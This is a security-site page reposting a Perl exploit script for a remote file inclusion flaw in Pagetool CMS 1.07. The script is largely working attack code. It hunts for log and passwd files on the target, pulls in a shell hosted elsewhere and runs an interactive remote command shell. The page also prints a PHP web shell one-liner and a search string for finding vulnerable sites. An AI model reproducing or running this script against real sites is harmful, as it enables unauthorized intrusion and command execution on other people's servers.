首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
来源:www.g00ns.net 作者:TrinTiTTy 发布时间:2006-12-25  

#!usr/bin/perl
use LWP::UserAgent;
####################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
#
#===========================INFO====================================
# Impact level: HIGH
#
# Google: powered by pagetool or Pagetool Development Team
#
# browser use:
# http://[ site ]/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
#
#=========================VULN CODE=================================
# Code:
#
# if (file_exists($config_file))
#{
# include($config_file);
#
# ...
# include($ptconf["src"] . "pagetool/pt_profile.inc");
# include($ptconf["src"] . "pagetool/pt_functions.inc");
#===================================================================
#
# Vulnerability Found by: FiSh and godXcel
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#---Exploit---#
#==========================================================#
# [Pagetool CMS <=1.07 (RFI)]
# [c]oded by TrinTiTTy -at- g00ns.net
#==========================================================#
#
# ! Vulnerability by FiSh and godXcel !
#
# Shoutz: z3r0, clorox, wicked, synical, ReZEN, grumpy,
# SiCK, and everyone else at g00ns.net
#
# greetz: 13337.org, acircle.us
#
# www.g00ns.net | irc.g00ns.net #g00ns | www.g00ns-forum.net
#
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# # Notes: #
# # Shell example <?passthru($_GET[cmd]);?> #
# # Shell variable: ($_GET[cmd]); #
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#==========================================================#

$host = @ARGV[0]; $shell = @ARGV[1];

if ($host =~ /http:\/\// || $shell =~ /http:\/\//)
{print "\n\n [-] Don't include http:// in your links!\n";usage();exit();}
elsif (@ARGV != 2) {head();usage();exit();}
head();
print "\n [!] Scanning for local server config file\n\n [!] Be patient...\n";

# No credz to me for below list..
@cfgs = ("/etc/passwd",
"../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../apache/logs/access.log",
"../../../../../var/log/httpd/error_log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log");
scan();
sub scan(){
for ($i = 0; $i <=40; ++$i){
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?";
$response = $ag3nt->get($inc);
syswrite STDOUT,".";
$ans = $response->content;
if( $ans =~ /500 Server closed connection without sending any data back/)
{print "\n\n [-] Couldn't Include Shell...better luck next time.\n\n";exit;}
elsif ($ans =~ /Cannot execute a blank command/)
{print "\n [+] Server File: FOUND\n\n [+] Executing Command Shell...\n\nType quit to exit shell\n";commands();}}}
print "\n\n [-] Couldn't find valid config file...better luck next time\n\n";exit;

sub commands(){
print "\nshell\@box \$~ ";
$nix=<STDIN>;
chomp($nix);
if ($nix =~ /quit/gmi){print "\n [-] Good Bye\n";exit();}
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?cmd=".$nix.'%00';
$response = $ag3nt->get($inc);
$ans = $response->content;
if ($ans =~ /<b>Warning<\/b>:/gmi || $ans =~ /<a href=/gmi)
{print " \n[-] ERROR: Bad command, permissions, website, or shell.\n";commands();}
else {print "\n$ans";commands();}}

sub head(){
print q {
|======================================================|
| Pagetool CMS <=1.07 (RFI) |
| [c]oded by TrinTiTTy -at- g00ns.net |
| -----------------------------------------------------|
| |
| Vulnerability by FiSh and godXcel |
| greetz: 13337.org, acircle.us |
| |
| www.g00ns.net |
|======================================================|
}}
sub usage(){
print q{
Usage: perl pagetool07.pl <host> <shell location>

Example: perl pagetool07.pl www.victim.net www.shellsite.com/shell.txt
}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultimate PHP Board <= 2.0b1
·MTCMS <= 2.0 (admin/admin_s
·Newsletter MX <= 1.0.2 (ID)
·Ciberia Content Federator 1.0
·File Upload Manager <= 1.0.
·Fishyshoop <= 0.930b Remote
·Enthrallweb ePages (actualpic.
·Rediff Bol Downloader (ActiveX
·IXM Easy Personal FTP Server 5
·Formbankserver 1.9 (Name) Dire
·DREAM FTP Server 1.0.2 (PORT)
·Apple Quicktime (rtsp URL Hand
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved